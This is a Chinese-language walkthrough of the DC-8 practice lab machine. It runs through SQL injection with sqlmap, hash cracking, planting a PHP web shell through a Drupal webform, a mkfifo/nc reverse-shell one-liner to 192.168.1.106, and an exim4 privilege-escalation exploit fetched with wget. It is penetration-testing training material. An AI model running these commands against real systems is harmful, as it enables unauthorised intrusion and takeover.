DC-8
基础信息
整体上思路明确操作简单清晰
搭建靶机检测能否运行
主机发现与端口扫描
因为靶机与kali处在同一个网段,先对靶机的地址进行确认
nmap 192.168.1.0/24
发现地址为192.168.1.105,对开放端口进行详细探测
nmap -sV -p- -sS -A 192.168.1.105
SQL注入
访问80端口查看是否存在可以利用的信息
访问页面发现可能存在SQL注入
输入or 1=1 页面正常回显
输入and 1=2 页面出现问题
直接使用sqlmap爬取账号与密码
sqlmap -u "http://192.168.1.105/?nid=3" --dbs --batch 获取数据库
sqlmap -u "http://192.168.1.105/?nid=3" -D 'd7db' --tables --batch 获取表
sqlmap -u "http://192.168.1.105/?nid=3" -D 'd7db' -T 'users'--columns --batch 获取users表中的列
sqlmap -u "http://192.168.1.105/?nid=3" -D 'd7db' -T 'users' -C 'name,pass' --dump --batch
获取字段
获取到账号与密码但是密码是hash加密的需要进行爆破经过尝试只有john的密码成功爆破
vim passwd
john --show passwd 因为之前爆破过一次所以我直接使用show命令查看
获取shell
通过dirb 获取靶机目录
dirb http://192.168.1.105/
发现dirb http://192.168.1.105/user是登录界面使用获取的账号进行登录
用户:john
密码:turtle
点击上面的Contact,选择Contact Us,后点击Webform -> form settings,选择PHP code,然后填入PHP一句话木马
保存之后返回页面提交信息
上传成功
使用蚁剑进行连接
提示在进行连接前需要把变量去除,若不去除变量无法连接成功
192.168.1.105/node/3/done?
连接成功
进入虚拟终端反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.106 1234 >/tmp/f
成功反弹shell,获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
提权
使用find命令查看可利用信息
find / -perm -u=s -type f 2>/dev/null
发现exim4可以利用
查询版本信息
使用searchsploit 查询可利用漏洞
将该脚本复制到root目录下并重新命名dc8.sh
使用python开启临时端口将脚本下载到靶机中
进行利用
python -m SimpleHTTPServer 8000
在下载之前需要先计入到靶机的/tmp目录下否则下载的脚本没有权限
通过wget命令下载
wget http://192.168.1.106:8000/dc8.sh
在下载之前需要先计入到靶机的/tmp目录下否则下载的脚本没有权限
chmod赋予脚本权限
chmod 777 dc8.sh
查看脚本发现有两条命令可以执行
./dc8.sh -m setuid
./dc8.sh -m netcat
执行命令发现报错信息,存在编码错误需要修改编码方式
进入kali查看脚本编码方式
set ff? 查看编码方式
set ff=unix 将编码方式改为unix编码
重新下载文件,赋予权限
并执行刚才的命令
./dc8.sh -m setuid 执行之后没有提权到root
尝试第二条命令./dc8.sh -m netcat
成功获取root权限
进入root目录下查看flag.txt
来源:freebuf.com 2021-01-31 13:53:46 by: WAFmax
请登录后发表评论
注册